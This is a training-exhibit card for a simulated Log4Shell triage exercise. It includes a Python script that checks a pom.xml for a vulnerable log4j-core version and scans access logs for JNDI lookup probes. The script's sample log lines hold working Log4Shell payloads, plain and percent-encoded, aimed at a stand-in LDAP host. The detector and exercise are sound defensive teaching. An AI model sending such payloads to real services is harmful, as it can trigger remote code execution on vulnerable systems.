EXH-020 | 2021 | Fictional reconstruction

${jndi:

December 2021. A string in a log line should be inert. In Log4j 2.x, it is a remote code execution primitive, through LDAP, through your own logging pipeline.

Type: Classic
Difficulty: Intermediate
Era: 2020s
Time: 10 min

Briefing

CVE-2021-44228, Log4Shell. This exhibit is triage: `pom.xml` plus nginx logs. No outbound LDAP from the museum terminal.

Your role

Platform engineer replaying December 10th: Maven coordinates, access logs, and the one-line patch.

Objective

Confirm vulnerable `log4j-core` on the classpath and find attacker probes in `access.log` using the JNDI lookup prefix.
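
One way to script the objective above, as an added example that is not the exhibit's own code: it reads the declared `log4j-core` version from a POM and flags access-log lines carrying the `${jndi:` prefix, including percent-encoded ones. The function names, sample POM and log lines are constructed for illustration, and the version check simplifies by treating every 2.x release below 2.15.0 as affected.

```python
import re
import xml.etree.ElementTree as ET
from urllib.parse import unquote

NS = {"m": "http://maven.apache.org/POM/4.0.0"}  # default Maven POM namespace
FIXED = (2, 15, 0)  # first log4j-core release with the CVE-2021-44228 fix
JNDI = re.compile(r"\$\{jndi:", re.IGNORECASE)

def log4j_core_version(pom_xml):
    """Return the declared log4j-core version string, or None if absent."""
    for dep in ET.fromstring(pom_xml).iterfind(".//m:dependency", NS):
        if dep.findtext("m:artifactId", namespaces=NS) == "log4j-core":
            return dep.findtext("m:version", namespaces=NS)
    return None

def is_vulnerable(version):
    """True for 2.x below 2.15.0; None when the version cannot be read directly."""
    m = re.match(r"(\d+)\.(\d+)(?:\.(\d+))?", version or "")
    if not m:
        return None  # e.g. a ${property} placeholder: resolve it with the build tool
    parts = tuple(int(g or 0) for g in m.groups())
    return parts[0] == 2 and parts < FIXED

def find_jndi_probes(lines):
    """Return (line_number, client_ip) for lines carrying the JNDI lookup prefix."""
    hits = []
    for n, line in enumerate(lines, 1):
        decoded = unquote(unquote(line))  # request URIs are logged percent-encoded
        if JNDI.search(line) or JNDI.search(decoded):
            hits.append((n, line.split(" ", 1)[0]))
    return hits

# Constructed sample inputs (hypothetical, not taken from the exhibit).
SAMPLE_POM = """<project xmlns="http://maven.apache.org/POM/4.0.0"><dependencies>
  <dependency><groupId>org.apache.logging.log4j</groupId>
    <artifactId>log4j-core</artifactId><version>2.14.1</version></dependency>
</dependencies></project>"""

SAMPLE_LOG = [
    '198.51.100.7 - - [10/Dec/2021:09:14:02 +0000] "GET /health HTTP/1.1" 200 2 "-" "curl/7.79.1"',
    '203.0.113.45 - - [10/Dec/2021:09:14:09 +0000] "GET / HTTP/1.1" 200 512 "-" "${jndi:ldap://probe.example/a}"',
    '203.0.113.46 - - [10/Dec/2021:09:15:31 +0000] "GET /?q=%24%7Bjndi%3Aldap%3A%2F%2Fprobe.example%2Fa%7D HTTP/1.1" 404 153 "-" "-"',
]

if __name__ == "__main__":
    v = log4j_core_version(SAMPLE_POM)
    print("log4j-core", v, "vulnerable:", is_vulnerable(v))
    print("probe lines:", find_jndi_probes(SAMPLE_LOG))
```

A `None` from `is_vulnerable` means the POM defers the version to a property or a parent, so the resolved dependency tree has to be checked instead.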

Terminal environment

user: responder
host: prod-java-trace
cwd: /srv/payments-api
steps: 3

Safety note. This is a safe reconstruction. All systems, files, hosts, credentials, and outputs are simulated. Do not use these techniques on systems you do not own or have explicit permission to test.